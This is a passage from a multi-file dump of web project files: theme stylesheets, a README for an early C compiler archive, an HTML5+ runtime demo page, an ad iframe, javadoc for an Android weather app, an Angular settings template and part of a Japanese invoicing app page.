rgba(0, 0, 0, 0.3); box-shadow: inset 0 -2px 6px rgba(0, 0, 0, 0.05), inset 0 -2px 30px rgba(0, 0, 0, 0.015), inset 0 1px 0 #fff, 0 1px 2px rgba(0, 0, 0, 0.3); border: 0; border-top: 3px solid #3498db; background-color: #F0F2F3; } .woocommerce-error li strong { color: #ff0000; } .jigoshop .site-content div.jigoshop_error span, .jigoshop .site-content div.jigoshop_message span { padding-bottom: 5px; color: #secondary_color; } a.button, button.button, input.button, #review_form #submit { padding: 6px 10px; } .jigoshop .products li { border: 1px solid #d6e6ea; position: relative; } .products li a img { border: 0; margin-bottom: 10px !important; display: block; margin-left: auto !important; margin-right: auto !important; } .related.products li a img { width: 150px !important; height: 150px !important; } .star-rating, p.stars span, .star-rating span, p.stars span a:hover, p.stars span a:focus, p.stars span a.active { background-image: url("images/star.png"); } a.lost_password { padding: 5px 10px; display: inline-block; } a.lost_password:hover { color: #34495E; } .info a { color: #3498db; } .info a:hover { color: #3498db; } .related.products li span.price { font-size: 15px; padding-top: 5px; } .form-cart-items td.actions a.checkout-button.button-alt:nth-of-type(2) { background: #87e0fd; /* Old browsers */ background: -moz-linear-gradient(top, #87e0fd 0%, #53cbf1 40%, #05abe0 100%); /* FF3.6+ */ background: -webkit-gradient(linear, left top, left bottom, color-stop(0%, #87e0fd), color-stop(40%, #53cbf1), color-stop(100%, #05abe0)); /* Chrome,Safari4+ */ background: -webkit-linear-gradient(top, #87e0fd 0%, #53cbf1 40%, #05abe0 100%); /* Chrome10+,Safari5.1+ */ background: -o-linear-gradient(top, #87e0fd 0%, #53cbf1 40%, #05abe0 100%); /* Opera 11.10+ */ background: -ms-linear-gradient(top, #87e0fd 0%, #53cbf1 40%, #05abe0 100%); /* IE10+ */ background: linear-gradient(to bottom, #87e0fd 0%, #53cbf1 40%, #05abe0 100%); /* W3C */ filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#87e0fd', endColorstr='#05abe0',GradientType=0 ); /* IE6-9 */ border-color: #6FB4E6; color: #FFFFFF; } .form-cart-items td.actions a.checkout-button.button-alt:nth-of-type(2):hover { background: #05abe0; /* Old browsers */ background: -moz-linear-gradient(top, #05abe0 0%, #53cbf1 60%, #87e0fd 100%); /* FF3.6+ */ background: -webkit-gradient(linear, left top, left bottom, color-stop(0%, #05abe0), color-stop(60%, #53cbf1), color-stop(100%, #87e0fd)); /* Chrome,Safari4+ */ background: -webkit-linear-gradient(top, #05abe0 0%, #53cbf1 60%, #87e0fd 100%); /* Chrome10+,Safari5.1+ */ background: -o-linear-gradient(top, #05abe0 0%, #53cbf1 60%, #87e0fd 100%); /* Opera 11.10+ */ background: -ms-linear-gradient(top, #05abe0 0%, #53cbf1 60%, #87e0fd 100%); /* IE10+ */ background: linear-gradient(to bottom, #05abe0 0%, #53cbf1 60%, #87e0fd 100%); /* W3C */ filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#05abe0', endColorstr='#87e0fd',GradientType=0 ); /* IE6-9 */ } a.button, button.button, input.button, #review_form #submit { color: #FFFFFF; } .products ul, ul.products { float: none; } #payment ul.payment_methods li input { margin-right: 5px !important; } button:hover, input[type="button"]:hover, input[type="reset"]:hover, input[type="submit"]:hover { background: #34495E; } #reviews h2 { margin-bottom: 20px; } /*-------------------------------------------------------------- 11.0 Infinite scroll --------------------------------------------------------------*/ /* Globally hidden elements when Infinite Scroll is supported and in use. */ .infinite-scroll .paging-navigation, .infinite-scroll.neverending .site-footer { /* Theme Footer (when set to scrolling) */ display: none; } /* When Infinite Scroll has reached its end we need to re-display elements that were hidden (via .neverending) before */ .infinity-end.neverending .site-footer { display: block; } /*-------------------------------------------------------------- 12.0 Media --------------------------------------------------------------*/ .page-content img.wp-smiley, .entry-content img.wp-smiley, .comment-content img.wp-smiley { border: none; margin-bottom: 0; margin-top: 0; padding: 0; } /* Make sure embeds and iframes fit their containers */ embed, iframe, object { max-width: 100%; } /*-------------------------------------------------------------- 12.1 Captions --------------------------------------------------------------*/ .wp-caption { margin-bottom: 1.5em; max-width: 100%; } .wp-caption img[class*="wp-image-"] { display: block; margin: 0 auto; } .wp-caption .wp-caption-text { margin: 0.8075em 0; } .wp-caption-text { text-align: center; } /*-------------------------------------------------------------- 12.2 Galleries --------------------------------------------------------------*/ .gallery { margin-bottom: 1.5em; } .gallery-item { display: inline-block; text-align: center; vertical-align: top; width: 100%; margin-bottom: 20px; } .gallery-item img { border: 1px solid #3498db; } .gallery-columns-2 .gallery-item { max-width: 50%; } .gallery-columns-3 .gallery-item { max-width: 33.33%; } .gallery-columns-4 .gallery-item { max-width: 25%; } .gallery-columns-5 .gallery-item { max-width: 20%; } .gallery-columns-6 .gallery-item { max-width: 16.66%; } .gallery-columns-7 .gallery-item { max-width: 14.28%; } .gallery-columns-8 .gallery-item { max-width: 12.5%; } .gallery-columns-9 .gallery-item { max-width: 11.11%; } .gallery-caption { display: block; } /*-------------------------------------------------------------- 12.3 Galleries --------------------------------------------------------------*/ @media only screen and (max-width: 1024px) { .jigoshop .site-content { width: 100%; } } @media only screen and (max-width: 960px) { .site-branding { height: auto; padding: 20px 0; } } @media only screen and (max-width: 768px) { .team-content, .innercol { background: none; } .team-col, .team-col:nth-of-type(3) { border-bottom: 1px solid #ccc; } .service-desc { margin-top: 20px; } } @media only screen and (max-width: 700px) { .flexslider .flex-image { height: auto; } #site-navigation { height: auto; } ol.comment-list .comment-body { width: 88%; } } @media only screen and (max-width: 500px) { .menu-toggle, .main-navigation.toggled .nav-menu { display: none; } .menu-all-pages-container { padding: 10px 0; } .menu-all-pages-container select { width: 100%; padding: 5px 0; } #service-tabs ul li a { border-bottom: 1px solid #425A73; display: block; } .comment-navigation .nav-previous, .paging-navigation .nav-previous, .post-navigation .nav-previous, .comment-navigation .nav-next, .paging-navigation .nav-next, .post-navigation .nav-next { float: none; width: 100%; margin-bottom: 10px; } .comment-navigation .nav-previous a, .paging-navigation .nav-previous a, .post-navigation .nav-previous a, .comment-navigation .nav-next a, .paging-navigation .nav-next a, .post-navigation .nav-next a { display: block; } .post-password-form input[type="submit"], .post-password-form input[type="password"] { width: 100%; margin-bottom: 10px; } ol.comment-list .comment-body { width: 85%; } ol.comment-list li > ul, ol.comment-list li > ol { margin-left: 0; } .widget_search input { width: 95%; } .gallery { width: 95%; } .gallery img { max-width: 90%; } .team-col p, .team-col h5 { margin: 0; float: none; } .team-col img { float: none; display: block; margin: 0 auto; } .flex-caption { top: 2%; } .flex-caption p { line-height: normal; } .flex-direction-nav a { top: 40%; } } /*# sourceMappingURL=style.css.map */
readme_files/c/52-readme.html
lalo/readme-fads
<div class="announce instapaper_body md" data-path="README.md" id="readme"><article class="markdown-body entry-content" itemprop="mainContentOfPage"><h1> <a name="user-content-legacy-cc" class="anchor" href="#legacy-cc" aria-hidden="true"><span class="octicon octicon-link"></span></a>legacy-cc</h1> <p>The earliest versions of the very first c compiler known to exist in the wild written by the late legend himself dmr. </p> <p>These are not capable of being compiled today with modern c compilers like gcc. I am only posting these here for the enjoyment and reminiscing of the spark that ignited a soon to be trillion dollar industry. Enjoy. :) </p> <p>You guys might be able to play around building this compilier with Aiju's pdp-11/unix emulator. I havent tried building this myself so I cant confirm it works, but I posted the link to his emulator for anybody wanting to hack around with it.</p> <p>Source: [<a href="http://cm.bell-labs.com/cm/cs/who/dmr/primevalC.html">http://cm.bell-labs.com/cm/cs/who/dmr/primevalC.html</a>] PDP-11 Emulator[<a href="http://pdp11.aiju.de/">http://pdp11.aiju.de/</a>]</p></article></div>
XlvrenProject_Html/XlvrenCharge/plus/runtime.html
NSStringDong/XlvrenCharge
<!DOCTYPE HTML> <html> <head> <meta charset="utf-8"/> <meta name="viewport" content="initial-scale=1.0, maximum-scale=1.0, user-scalable=no"/> <meta name="HandheldFriendly" content="true"/> <meta name="MobileOptimized" content="320"/> <title>Hello H5+</title> <script type="text/javascript" src="../js/common.js"></script> <script type="text/javascript"> function getVersion(){ outSet("程序版本号:"+plus.runtime.version+"\n内核版本号:"+plus.runtime.innerVersion); } function getArguments(){ outSet("启动方式: "+plus.runtime.launcher+"\n启动参数: "+plus.runtime.arguments); } function restartApp() { plus.runtime.restart(); } function getWidgetInfo() { plus.runtime.getProperty( plus.runtime.appid, function ( wgtinfo ) { //appid属性 var wgtStr = "appid:"+wgtinfo.appid; //version属性 wgtStr += "\nversion:"+wgtinfo.version; //name属性 wgtStr += "\nname:"+wgtinfo.name; //description属性 wgtStr += "\ndescription:"+wgtinfo.description; //author属性 wgtStr += "\nauthor:"+wgtinfo.author; //email属性 wgtStr += "\nemail:"+wgtinfo.email; //licence属性 wgtStr += "\nlicense:"+wgtinfo.license; //licensehref属性 wgtStr += "\nlicensehref:"+wgtinfo.licensehref; //features 属性 wgtStr += "\nfeatures:"+wgtinfo.features; outSet( wgtStr ); } ); } function setBadge() { plus.runtime.setBadgeNumber( 50 ); outSet( "设置程序图标右上角显示的提示数字为50\n请返回桌面查看" ); if(plus.os.name=="iOS"){ outLine( '*如果无法设置提示数字,请到"设置"->"通知"中配置应用在通知中心显示!' ); }else{ outLine( "注:仅支持小米(MIUI v5),其它设备暂不支持此功能!" ); } } function clearBadge() { plus.runtime.setBadgeNumber( 0 ); outSet( "清除程序图标右上角显示的提示数字\n请返回桌面查看" ); if(plus.os.name=="iOS"){ outLine( '如果无法清除提示数字,请到"设置"->"通知"中配置应用在通知中心显示!' ); }else{ outLine( "注:仅支持小米(MIUI v5),其它设备暂不支持此功能!" ); } } function exitApp(){ if(plus.os.name=="Android"){ plus.runtime.quit(); }else{ outSet( "此平台不支持直接退出程序,请按Home键切换应用" ); } } function updateApp(){ var url='http://demo.dcloud.net.cn/helloh5/update/HelloH5.wgtu'; plus.nativeUI.showWaiting("升级中..."); var dtask = plus.downloader.createDownload( url, {method:"GET"}, function(d,status){ if ( status == 200 ) { console.log( "Download wgtu success: " + d.filename ); plus.runtime.install(d.filename,{},function(){ plus.nativeUI.closeWaiting(); plus.nativeUI.alert("Update wgtu success, restart now!",function(){ plus.runtime.restart(); }); },function(e){ plus.nativeUI.closeWaiting(); alert("Update wgtu failed: "+e.message); }); } else { plus.nativeUI.closeWaiting(); alert( "Download wgtu failed: " + status ); } } ); dtask.addEventListener('statechanged',function(d,status){ console.log("statechanged: "+d.state); }); dtask.start(); } </script> <link rel="stylesheet" href="../css/common.css" type="text/css" charset="utf-8"/> </head> <body> <header id="header"> <div class="nvbt iback" onclick="back(true);"></div> <div class="nvtt">Runtime</div> <div class="nvbt idoc" onclick="openDoc('Runtime Document','/doc/runtime.html')"></div> </header> <div id="dcontent" class="dcontent"> <br/> <div class="button" onclick="clicked('runtime_launch.html',true);"> 调用第三方程序 </div> <br/> <ul class="dlist"> <li class="ditem" onclick="getVersion()">获取版本信息</li> <li class="ditem" onclick="getArguments()">获取启动信息</li> <li class="ditem" onclick="restartApp()">重启当前应用</li> <li class="ditem" onclick="getWidgetInfo()">获取当前应用的基本属性</li> <li class="ditem" onclick="setBadge()">设置程序图标右上角数字</li> <li class="ditem" onclick="clearBadge()">清除程序图标右上角数字</li> <li class="ditem" onclick="exitApp()">退出当前应用</li> <!--li class="ditem" onclick="updateApp()">WGTU Update</li--> </ul> </div> <div id="output"> Runtime管理程序运行时环境,可用于获取程序的各种信息、与第三方程序通讯等。 </div> </body> <script type="text/javascript" src="../js/immersed.js" ></script> </html>
doc/themeforest/pearl/01.html-website/_layout/css/base.css
olabimaker/siteolabi
/** * Name: base.css * * T.O.C * * #CssReset * #Typography * #Links * #Lists * #Images * #Tables * #Forms * #Misc */ /* ========================================================================== #CssReset ========================================================================== */ html, body, div, span, applet, object, iframe, h1, h2, h3, h4, h5, h6, p, blockquote, pre, a, abbr, acronym, address, big, cite, code, del, dfn, em, img, ins, kbd, q, s, samp, small, strike, strong, sub, sup, tt, var, b, u, i, center, dl, dt, dd, ol, ul, li, fieldset, form, label, legend, table, caption, tbody, tfoot, thead, tr, th, td, article, aside, canvas, details, embed, figure, figcaption, footer, header, hgroup, menu, nav, output, ruby, section, summary, time, mark, audio, video { margin: 0; padding: 0; border: 0; font-size: 100%; font: inherit; vertical-align: baseline; } /* HTML5 display-role reset for older browsers */ article, aside, details, figcaption, figure, footer, header, hgroup, menu, nav, section { display: block; } body { line-height: 1; } ol, ul { list-style: none; } blockquote, q { quotes: none; } blockquote:before, blockquote:after, q:before, q:after { content: ''; content: none; } table { border-collapse: collapse; border-spacing: 0; } /** * 1. Always force vertical scroll * 2. Prevent iOS text size adjust after orientation change, without disabling user zoom. * 3. For animations */ html { font-size: 100%; overflow-y: scroll; /* 1 */ -ms-text-size-adjust: 100%; /* 2 */ -webkit-text-size-adjust: 100%; /* 2 */ -webkit-font-smoothing: antialiased; overflow-x: hidden; /* 3 */ } /* ========================================================================== #Typography ========================================================================== */ /** * 1. For animations */ body { overflow-x: hidden; /* 1 */ background-color: #fff; color: #5e5e5e; font: 14px 'Open Sans', Arial, sans-serif; line-height: 24px; font-weight: 300; } h1, h2, h3, h4, h5, h6 { color: #5e5e5e; font-family: 'Open Sans', Arial, sans-serif; font-weight: 400; } h1 a, h2 a, h3 a, h4 a, h5 a, h6 a { font-weight: inherit; } h1 { margin-bottom: 14px; font-size: 30px; line-height: 36px; } h2 { margin-bottom: 10px; font-size: 24px; line-height: 40px; } h3 { margin-bottom: 8px; font-size: 18px; line-height: 24px; } h4 { margin-bottom: 4px; font-size: 16px; line-height: 30px; } h5 { font-size: 14px; line-height: 24px; } h6 { font-size: 12px; line-height: 21px; } p { margin-bottom: 20px; } em { font-style: italic; } strong { font-weight: 600; } small { font-size: 70%; } sub { vertical-align: sub; font-size: 75%; } sup { vertical-align: super; font-size: 75%; } abbr[title] { border-bottom: 1px dotted #999; cursor: help; } address { display: block; margin-bottom: 20px; } blockquote {} blockquote p { font-style: italic; } blockquote span { display: block; margin-top: 5px; color: #999999; } blockquote span:before { content: "\2013 \00A0"; } hr { height: 0; border: solid #efefef; border-width: 1px 0 0 0; margin: 30px 0; } code, pre { -webkit-border-radius: 3px; border-radius: 3px; font-family: Monaco, Menlo, Consolas, "Courier New", monospace; } code { padding: 1px 4px; border: 1px solid #e1e1e8; background-color: #f7f7f7; color: #d14; } pre { overflow-x: auto; display: block; padding: 20px; border: 1px solid #e1e1e8; margin-bottom: 20px; white-space: pre-wrap; background-color: #f7f7f7; } /* Typography Helper Classes */ /** * <div class="hr"></div> acts like an <hr /> */ .hr { border-top: 1px solid #efefef; margin: 30px 0; } .text-left { text-align: left; } .text-right { text-align: right; } .text-center { text-align: center; } .text-highlight { color: #ea6872; } .text-uppercase { text-transform: uppercase; } .mute{ color: #aaa; } p.last, h1.last, h2.last, h3.last, h4.last, h5.last, address.last { margin-bottom: 0; } /* #Links ========================================================================== */ a, a:visited { color: #ea6872; text-decoration: none; } /** * 1. Remove the gray background color from active links in IE 10. */ a:active { background: transparent; /* 1 */ } a:hover, a:focus { outline: 0; text-decoration: underline; } /* #Lists ========================================================================== */ ul, ol { margin-bottom: 20px; list-style-position: inside; } ul ul, ul ol, ol ol, ol ul { margin-bottom: 0; margin-left: 30px; } li {} ul { list-style-type: disc; } ol { list-style-type: decimal; } /* List Helper Classes */ ul.last, ol.last { margin-bottom: 0; } /* #Images ========================================================================== */ img { border: none; } /* Images Helper Classes */ .img-align-left { float: left; margin: 5px 10px 0 0; } .img-align-right { float: right; margin: 5px 0 0 10px; } /* #Tables ========================================================================== */ table { width: 100%; margin-bottom: 20px; border-collapse: collapse; border-spacing: 0; background-color: transparent; } caption { margin: 20px 0; text-align: center; } table th, table td { padding: 15px 8px; border-top: 1px solid #acacac; text-align: center; vertical-align: top; } table th { border-top: none; background-color: #ea6872; color: #fff; font-size: 16px; font-weight: 700; } table thead th { vertical-align: bottom; } /* #Forms ========================================================================== */ form {} fieldset {} form p {} label { display: block; margin-bottom: 5px; } label span { color: #ff0000; } select, button, input[type="button"], input[type="reset"], input[type="submit"], input[type="radio"], input[type="checkbox"] { cursor: pointer; } /* * 1. stop safari from overwriting input styles */ input, textarea, select { -webkit-appearance: none; /* 1 */ display: block; max-width: 100%; -webkit-box-sizing: border-box; -moz-box-sizing: border-box; box-sizing: border-box; padding: 10px; border: 1px solid #acacac; -webkit-border-radius: 10px; border-radius: 10px; margin-bottom: 10px; background: transparent; color: #666; font: 12px 'Open Sans', Arial, sans-serif; } input[type="text"]:focus, input[type="email"]:focus, input[type="url"]:focus, textarea:focus { border-color: #888; outline: 0; } select { height: 40px; border-radius: 5px; } select:focus { outline: thin dotted #333; outline: 5px auto -webkit-focus-ring-color; outline-offset: -2px; } textarea { min-height: 100px; overflow: auto; } .radio, .checkbox { min-height: 18px; padding-left: 18px; } .radio input[type="radio"], .checkbox input[type="checkbox"] { float: left; margin-left: -18px; } input:-moz-placeholder, textarea:-moz-placeholder { color: #ccc; } input:-ms-input-placeholder, textarea:-ms-input-placeholder { color: #ccc; } input::-webkit-input-placeholder, textarea::-webkit-input-placeholder { color: #ccc; } /* #Misc ========================================================================== */ .javascript-required { padding: 15px 0; background-color: #f00; color: #fff; text-align:center; font-weight: bold; }
spc/Statistical Process Control and Process Control Tools ASQ_files/abmw_ssl(1).html
bladerunner92/web-tutorial
<!-- saved from url=(0107)https://www.naylornetwork.com/absolutebm/abmw_ssl.aspx?a=ASQ-WEB-VerticalBanner03&K=Sub%20Page&isframe=true --> <html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>Advertisement</title> <meta name="ROBOTS" content="NOINDEX, NOFOLLOW"> <style>img{max-width: 100%;}</style> <!-- Copyright(c)2004 By XIGLA SOFTWARE : http://www.xigla.com --> </head><body leftmargin="0" topmargin="0" marginwidth="0" bottommargin="0" rightmargin="0" marginheight="0"> <!--<base target="_top">--><base href="." target="_top"><div id="ABMbanner" style="position:absolute;"><a href="https://www.naylornetwork.com/absolutebm/abmc.aspx?b=27666&z=2410" target="_blank"><img src="579104_Quality_CVB.gif" border="0" alt="Quality Council of Indiana" name="Quality Council of Indiana"></a></div> </body></html>
docs/overview-tree.html
beegee-tokyo/WeatherStation
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="en"> <head> <!-- Generated by javadoc (version 1.7.0_75) on Sun Aug 23 10:55:35 SGT 2015 --> <title>Class Hierarchy</title> <meta name="date" content="2015-08-23"> <link rel="stylesheet" type="text/css" href="stylesheet.css" title="Style"> </head> <body> <script type="text/javascript"><!-- if (location.href.indexOf('is-external=true') == -1) { parent.document.title="Class Hierarchy"; } //--> </script> <noscript> <div>JavaScript is disabled on your browser.</div> </noscript> <!-- ========= START OF TOP NAVBAR ======= --> <div class="topNav"><a name="navbar_top"> <!-- --> </a><a href="#skip-navbar_top" title="Skip navigation links"></a><a name="navbar_top_firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="tk/giesecke/weatherstation/package-summary.html">Package</a></li> <li>Class</li> <li>Use</li> <li class="navBarCell1Rev">Tree</li> <li><a href="index-all.html">Index</a></li> <li><a href="help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li>Prev</li> <li>Next</li> </ul> <ul class="navList"> <li><a href="index.html?overview-tree.html" target="_top">Frames</a></li> <li><a href="overview-tree.html" target="_top">No Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_top"> <li><a href="allclasses-noframe.html">All Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_top"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <a name="skip-navbar_top"> <!-- --> </a></div> <!-- ========= END OF TOP NAVBAR ========= --> <div class="header"> <h1 class="title">Hierarchy For All Packages</h1> <span class="strong">Package Hierarchies:</span> <ul class="horizontal"> <li><a href="tk/giesecke/weatherstation/package-tree.html">tk.giesecke.weatherstation</a></li> </ul> </div> <div class="contentContainer"> <h2 title="Class Hierarchy">Class Hierarchy</h2> <ul> <li type="circle">java.lang.Object <ul> <li type="circle">android.content.BroadcastReceiver <ul> <li type="circle">android.appwidget.AppWidgetProvider <ul> <li type="circle">tk.giesecke.weatherstation.<a href="tk/giesecke/weatherstation/WidgetValues.html" title="class in tk.giesecke.weatherstation"><span class="strong">WidgetValues</span></a></li> </ul> </li> <li type="circle">tk.giesecke.weatherstation.<a href="tk/giesecke/weatherstation/AutoStart.html" title="class in tk.giesecke.weatherstation"><span class="strong">AutoStart</span></a></li> <li type="circle">tk.giesecke.weatherstation.<a href="tk/giesecke/weatherstation/ScreenReceiver.html" title="class in tk.giesecke.weatherstation"><span class="strong">ScreenReceiver</span></a></li> </ul> </li> <li type="circle">android.content.Context <ul> <li type="circle">android.content.ContextWrapper <ul> <li type="circle">android.view.ContextThemeWrapper <ul> <li type="circle">android.app.Activity (implements android.content.ComponentCallbacks2, android.view.KeyEvent.Callback, android.view.LayoutInflater.Factory2, android.view.View.OnCreateContextMenuListener, android.view.Window.Callback, android.view.Window.OnWindowDismissedCallback) <ul> <li type="circle">android.support.v4.app.FragmentActivity <ul> <li type="circle">android.support.v7.app.AppCompatActivity (implements android.support.v7.app.ActionBarDrawerToggle.DelegateProvider, android.support.v7.app.AppCompatCallback, android.support.v4.app.TaskStackBuilder.SupportParentable) <ul> <li type="circle">android.support.v7.app.ActionBarActivity <ul> <li type="circle">tk.giesecke.weatherstation.<a href="tk/giesecke/weatherstation/WeatherStation.html" title="class in tk.giesecke.weatherstation"><span class="strong">WeatherStation</span></a> (implements android.widget.AdapterView.OnItemClickListener, android.hardware.SensorEventListener, android.view.View.OnClickListener) <ul> <li type="circle">tk.giesecke.weatherstation.<a href="tk/giesecke/weatherstation/Utils.html" title="class in tk.giesecke.weatherstation"><span class="strong">Utils</span></a> (implements android.widget.AdapterView.OnItemClickListener)</li> </ul> </li> </ul> </li> </ul> </li> </ul> </li> <li type="circle">tk.giesecke.weatherstation.<a href="tk/giesecke/weatherstation/WidgetValuesConfigure.html" title="class in tk.giesecke.weatherstation"><span class="strong">WidgetValuesConfigure</span></a></li> </ul> </li> </ul> </li> <li type="circle">android.app.Service (implements android.content.ComponentCallbacks2) <ul> <li type="circle">tk.giesecke.weatherstation.<a href="tk/giesecke/weatherstation/BGService.html" title="class in tk.giesecke.weatherstation"><span class="strong">BGService</span></a> (implements android.hardware.SensorEventListener)</li> <li type="circle">android.app.IntentService <ul> <li type="circle">tk.giesecke.weatherstation.<a href="tk/giesecke/weatherstation/WidgetValuesService.html" title="class in tk.giesecke.weatherstation"><span class="strong">WidgetValuesService</span></a> (implements android.hardware.SensorEventListener)</li> </ul> </li> </ul> </li> </ul> </li> </ul> </li> <li type="circle">android.database.sqlite.SQLiteOpenHelper <ul> <li type="circle">tk.giesecke.weatherstation.<a href="tk/giesecke/weatherstation/WSDatabaseHelper.html" title="class in tk.giesecke.weatherstation"><span class="strong">WSDatabaseHelper</span></a></li> </ul> </li> <li type="circle">tk.giesecke.weatherstation.<a href="tk/giesecke/weatherstation/SwipeDetector.html" title="class in tk.giesecke.weatherstation"><span class="strong">SwipeDetector</span></a> (implements android.view.View.OnTouchListener)</li> <li type="circle">android.view.View (implements android.view.accessibility.AccessibilityEventSource, android.graphics.drawable.Drawable.Callback, android.view.KeyEvent.Callback) <ul> <li type="circle">tk.giesecke.weatherstation.<a href="tk/giesecke/weatherstation/GaugeView.html" title="class in tk.giesecke.weatherstation"><span class="strong">GaugeView</span></a></li> </ul> </li> </ul> </li> </ul> <h2 title="Interface Hierarchy">Interface Hierarchy</h2> <ul> <li type="circle">tk.giesecke.weatherstation.<a href="tk/giesecke/weatherstation/SwipeDetector.onSwipeEvent.html" title="interface in tk.giesecke.weatherstation"><span class="strong">SwipeDetector.onSwipeEvent</span></a></li> </ul> <h2 title="Enum Hierarchy">Enum Hierarchy</h2> <ul> <li type="circle">java.lang.Object <ul> <li type="circle">java.lang.Enum&lt;E&gt; (implements java.lang.Comparable&lt;T&gt;, java.io.Serializable) <ul> <li type="circle">tk.giesecke.weatherstation.<a href="tk/giesecke/weatherstation/SwipeDetector.SwipeTypeEnum.html" title="enum in tk.giesecke.weatherstation"><span class="strong">SwipeDetector.SwipeTypeEnum</span></a></li> </ul> </li> </ul> </li> </ul> </div> <!-- ======= START OF BOTTOM NAVBAR ====== --> <div class="bottomNav"><a name="navbar_bottom"> <!-- --> </a><a href="#skip-navbar_bottom" title="Skip navigation links"></a><a name="navbar_bottom_firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="tk/giesecke/weatherstation/package-summary.html">Package</a></li> <li>Class</li> <li>Use</li> <li class="navBarCell1Rev">Tree</li> <li><a href="index-all.html">Index</a></li> <li><a href="help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li>Prev</li> <li>Next</li> </ul> <ul class="navList"> <li><a href="index.html?overview-tree.html" target="_top">Frames</a></li> <li><a href="overview-tree.html" target="_top">No Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_bottom"> <li><a href="allclasses-noframe.html">All Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_bottom"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <a name="skip-navbar_bottom"> <!-- --> </a></div> <!-- ======== END OF BOTTOM NAVBAR ======= --> </body> </html>
python/racepi_config_webapp/static/views/settings/settings.template.html
donour/racepi
<div> <div> <!--This doesn't properly select the active config--> Active Config: <select ng-init="vm.selectedConfig = vm.config_profiles[0]" ng-model="vm.selectedConfig" ng-options="x for x in vm.config_profiles" ng-change="vm.load_fields()" ></select> </div> <div> <table class="table table-striped"> <tr> <td>ID</td> <td><input ng-model="vm.config_setting.configuration_profile.id"></td> </tr> <tr> <td>Recordings DB</td> <td><input ng-model="vm.config_setting.configuration_profile.session_db_path"></td> </tr> <tr> <td>Config Name</td> <td><input ng-model="vm.config_setting.configuration_profile.name"></td> </tr> </table> <input type="submit" ng-click="vm.save_fields()" value="Save"/> </div> </div>
bill/maintenance.html
jwam/bill
<!DOCTYPE html> <html lang="ja"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <!-- The above 3 meta tags *must* come first in the head; any other head content must come *after* these tags --> <meta name="description" content=""> <meta name="author" content=""> <link rel="icon" href="../images/favicon.ico"> <title>メンテナンス</title> <!-- Bootstrap core CSS --> <link href="../css/bootstrap.min.css" rel="stylesheet"> <!-- Custom styles for this template --> <link href="../css/home.css" rel="stylesheet"> <link href="../css/input.css" rel="stylesheet"> <link href="../css/bootstrap-datepicker3.min.css" rel="stylesheet" type="text/css"> <link href="../css/bootstrap-select.css" rel="stylesheet" type="text/css"> <!-- Just for debugging purposes. Don't actually copy these 2 lines! --> <!--[if lt IE 9]><script src="../../assets/js/ie8-responsive-file-warning.js"></script><![endif]--> <script src="../assets/js/ie-emulation-modes-warning.js"></script> <!-- HTML5 shim and Respond.js for IE8 support of HTML5 elements and media queries --> <!--[if lt IE 9]> <script src="https://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js"></script> <script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script> <![endif]--> </head> <body> <nav class="navbar navbar-inverse navbar-fixed-top"> <div class="container-fluid"> <div class="navbar-header"> <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar" aria-expanded="false" aria-controls="navbar"> <span class="sr-only">Toggle navigation</span> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> <a class="navbar-brand" href="#">請求書作成</a> </div> <div id="navbar" class="navbar-collapse collapse"> <ul class="nav navbar-nav navbar-right"> <li><a href="../home.html"><span class="glyphicon glyphicon-dashboard" aria-hidden="true"></span> ダッシュボード</a></li> <li><a href="../bill/home.html">請求書</a></li> <li><a href="../estimate/home.html">見積書</a></li> <li><a href="../order/home.html">注文書</a></li> <li><a href="../receipt/home.html">領収書</a></li> <li><a href="../setting.html"><span class="glyphicon glyphicon-cog" aria-hidden="true"></span> 設定</a></li> <li><a href="../profile.html"><span class="glyphicon glyphicon-user" aria-hidden="true"></span> プロフィール</a></li> <li><a href="../help.html"><span class="glyphicon glyphicon-question-sign" aria-hidden="true"></span> ヘルプ</a></li> <li><a href="../index.html"><span class="glyphicon glyphicon-log-out" aria-hidden="true"></span> ログオフ</a></li> </ul> <form class="navbar-form navbar-right"> <input type="text" class="form-control" placeholder="Search..."> </form> </div> </div> </nav> <div class="container-fluid"> <div class="row"> <div class="col-sm-3 col-md-2 sidebar"> <a href="./register.html" class="btn btn-primary btn-block">新規作成</a> <ul class="nav nav-sidebar"> </ul> <ul class="nav nav-sidebar"> <li><a href="./home.html"><span class="glyphicon glyphicon-home" aria-hidden="true"></span> ホーム</a></li> <li><a href="./created.html"><span class="glyphicon glyphicon-tasks" aria-hidden="true"></span> 作成済み <span class="badge">13</span></a></li> <li><a href="./send.html"><span class="glyphicon glyphicon-envelope" aria-hidden="true"></span> 請求済み <span class="badge">4</span></a></li> <li><a href="./search.html"><span class="glyphicon glyphicon-search" aria-hidden="true"></span> 請求書検索</a></li> <li><a href="./export.html"><span class="glyphicon glyphicon-export" aria-hidden="true"></span> 請求書一覧の出力</a></li> <li><a href="./draft.html"><span class="glyphicon glyphicon-th-list" aria-hidden="true"></span> 下書き <span class="badge">7</span></a></li> </ul> <ul class="nav nav-sidebar"> <li class="active"><a href="#"><span class="glyphicon glyphicon-wrench" aria-hidden="true"></span> メンテナンス <span class="sr-only">(current)</span></a></li> <li><a href="./template.html"><span class="glyphicon glyphicon-print" 